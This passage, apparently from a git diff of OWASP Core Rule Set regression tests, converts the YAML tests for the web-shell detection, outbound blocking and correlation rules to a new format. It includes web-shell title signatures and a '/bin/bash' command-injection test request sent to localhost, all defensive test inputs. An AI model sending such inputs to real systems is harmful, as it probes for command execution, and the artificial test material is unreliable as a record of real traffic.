.:NCC:. Shell v"} - output: - log_contains: "id \"955100\"" - - test_title: 955100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": "

.:NCC:. Shell v"} + output: + log_contains: "id \"955100\"" + - test_id: 2 desc: "Matching web shell Simple PHP backdoor" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": ""} - output: - log_contains: "id \"955100\"" - - test_title: 955100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": ""} + output: + log_contains: "id \"955100\"" + - test_id: 3 desc: "Matching web shell WinX Shell" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": "-:[GreenwooD]:- WinX Shell"} - output: - log_contains: "id \"955100\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": "-:[GreenwooD]:- WinX Shell"} + output: + log_contains: "id \"955100\"" diff --git a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml index 68483c2cf..8a95998fd 100644 --- a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml +++ b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml @@ -1,27 +1,24 @@ --- meta: author: "azurit" - enabled: true - name: "955260.yaml" description: "Regression tests for rule 955260" tests: - - test_title: 955260-1 + - test_id: 1 desc: "Matching web shell Ru24PostWebShell. Our test infrastructure, currently, cannot run this test properly because of multiline output, so it's disabled." stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: "{\"body\": \"\\n\\nRu24PostWebShell -\"}" - output: - log_contains: "id \"955260\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: "{\"body\": \"<html>\\n<head>\\n<title>Ru24PostWebShell -\"}" + output: + log_contains: "id \"955260\"" diff --git a/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml b/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml index 46a3b5433..9f1457ae6 100644 --- a/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml +++ b/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml @@ -1,72 +1,68 @@ --- meta: author: "studersi, azurit" - enabled: true - name: "959100.yaml" description: | Test whether the outbound blocking mechanism works by testing whether rule 959100 is triggered. For these tests, existing test are repurposed with different assertions. Instead of asserting that the original rules are triggered that the tests are written for, we assert that triggering these rules causes the blocking rule to be triggered. +rule_id: 959100 tests: - - test_title: 959100-1 + - test_id: 1 desc: Test is basically identical to 953120-1 (PHP leakage positive test in phase 4) but here we assert that the outbound blocking mechanism is triggered stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" - output: - log_contains: "id \"959100\"" - - test_title: 959100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" + output: + log_contains: "id \"959100\"" + - test_id: 2 desc: Test is basically identical to 953120-1 (PHP leakage negative test in phase 4) but here we assert that the outbound blocking mechanism is not triggered stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "<?php12345"} - output: - no_log_contains: "id \"959100\"" - - test_title: 959100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "<?php12345"} + output: + no_log_contains: "id \"959100\"" + - test_id: 3 desc: Test is basically identical to 959100-1 (see above) but here we assert that the scores are summed up and reported properly stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" - output: - log_contains: "Outbound Anomaly Score Exceeded [(]Total Score: " + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" + output: + log_contains: "Outbound Anomaly Score Exceeded [(]Total Score: " diff --git a/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml b/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml index df07008b4..2f454e790 100644 --- a/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml +++ b/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml @@ -1,78 +1,74 @@ --- meta: author: "studersi, azurit" - enabled: true - name: "980170.yaml" description: | Test whether level 4 inbound reporting in phase 5 works by testing whether rule 980170 is triggered. For these tests, existing test are repurposed with different assertions. Instead of asserting that the original rules are triggered that the tests are written for, we assert that triggering these rules causes the corresponding reporting rules to be triggered. +rule_id: 980170 tests: - - test_title: 980170-1 + - test_id: 1 desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is logged that was blocked stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "127.0.0.1" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - # Will match rules - # - 920273: restricted characters violation - # - 920350: numeric IP in Host header - # - 932160: Unix remote command execution - # - 932236: Unix command injection - # - 932260: Unix remote command execution - uri: "/get?a=/bin/bash" - version: "HTTP/1.1" - output: - # Phase 5 rules are prone to a race condition when parsing log output. - # Retry the test once if it fails to work around this issue. - # See https://github.com/coreruleset/go-ftw/issues/141. - retry_once: true - log_contains: "id \"980170\"" - - test_title: 980170-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "127.0.0.1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + # Will match rules + # - 920273: restricted characters violation + # - 920350: numeric IP in Host header + # - 932160: Unix remote command execution + # - 932236: Unix command injection + # - 932260: Unix remote command execution + uri: "/get?a=/bin/bash" + version: "HTTP/1.1" + output: + # Phase 5 rules are prone to a race condition when parsing log output. + # Retry the test once if it fails to work around this issue. + # See https://github.com/coreruleset/go-ftw/issues/141. + retry_once: true + log_contains: "id \"980170\"" + - test_id: 2 desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is logged that scored but was not blocked stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - # Will match rule 920350: numeric IP in Host header - Host: "127.0.0.1" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - # Phase 5 rules are prone to a race condition when parsing log output. - # Retry the test once if it fails to work around this issue. - # See https://github.com/coreruleset/go-ftw/issues/141. - retry_once: true - log_contains: "id \"980170\"" - - test_title: 980170-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + # Will match rule 920350: numeric IP in Host header + Host: "127.0.0.1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + # Phase 5 rules are prone to a race condition when parsing log output. + # Retry the test once if it fails to work around this issue. + # See https://github.com/coreruleset/go-ftw/issues/141. + retry_once: true + log_contains: "id \"980170\"" + - test_id: 3 desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is not logged that did not score stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - # Phase 5 rules are prone to a race condition when parsing log output. - # Retry the test once if it fails to work around this issue. - # See https://github.com/coreruleset/go-ftw/issues/141. - retry_once: true - no_log_contains: "id \"980170\"" + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + # Phase 5 rules are prone to a race condition when parsing log output. + # Retry the test once if it fails to work around this issue. + # See https://github.com/coreruleset/go-ftw/issues/141. + retry_once: true + no_log_contains: "id \"980170\"" diff --git a/tests/regression/tests/base_positive_rules.py b/tests/regression/tests/base_positive_rules.py index 2617ad7a7..9400d085c 100755 --- a/tests/regression/tests/base_positive_rules.py +++ b/tests/regression/tests/base_positive_rules.py @@ -17,9 +17,7 @@ skeletontest=0 Meta='''--- meta: - author: "spartantri" - enabled: true - name: "skeletonid.yaml" + author: "spartantri" name: "skeletonid.yaml" description: "Positive tests for rule skeletonid" tests: ''' diff --git a/tests/regression/tests/positivetest-light.yaml.skeleton b/tests/regression/tests/positivetest-light.yaml.skeleton index 65ca49569..07edf93e4 100644 --- a/tests/regression/tests/positivetest-light.yaml.skeleton +++ b/tests/regression/tests/positivetest-light.yaml.skeleton @@ -1,255 +1,223 @@ - - test_title: skeletonid-skeletontest + test_id: 1 desc: "Argument test includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=skeletonkeyword" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 2 desc: "Argument name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - method: "POST" - version: "HTTP/1.0" - data: "skeletonkeyword=test" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword=test" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 3 desc: "Cookie test includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - Cookie: test=skeletonkeyword - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: test=skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 4 desc: "Cookie name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - Cookie: skeletonkeyword=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: skeletonkeyword=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 5 desc: "Request header test includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - test: skeletonkeyword - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + test: skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 6 desc: "XML attribute value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"skeletonkeyword\">element_value</element></xml>" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"skeletonkeyword\">element_value</element></xml>" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 7 desc: "XML element value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 8 desc: "Nested XML element value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">skeletonkeyword</element></l3></l2></l1></xml>" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">skeletonkeyword</element></l3></l2></l1></xml>" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 9 desc: "Content-Type text/plain includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=skeletonkeyword" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 10 desc: "Content-Type application/json arg value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"skeletonkeyword\"}" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"skeletonkeyword\"}" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 11 desc: "Content-Type application/json arg name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"skeletonkeyword\": \"test\"}" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"skeletonkeyword\": \"test\"}" + output: + log_contains: "id \"skeletonid\"" diff --git a/tests/regression/tests/positivetest.yaml.skeleton b/tests/regression/tests/positivetest.yaml.skeleton index 83f0b2dee..181a36af4 100644 --- a/tests/regression/tests/positivetest.yaml.skeleton +++ b/tests/regression/tests/positivetest.yaml.skeleton @@ -1,393 +1,342 @@ - - - test_title: skeletonid-skeletontest + - test_id: 1 desc: "Argument test includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=skeletonkeyword" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 2 desc: "Argument name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - method: "POST" - version: "HTTP/1.0" - data: "skeletonkeyword=test" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword=test" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 3 desc: "Cookie test includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - Cookie: test=skeletonkeyword - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: test=skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 4 desc: "Cookie name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: 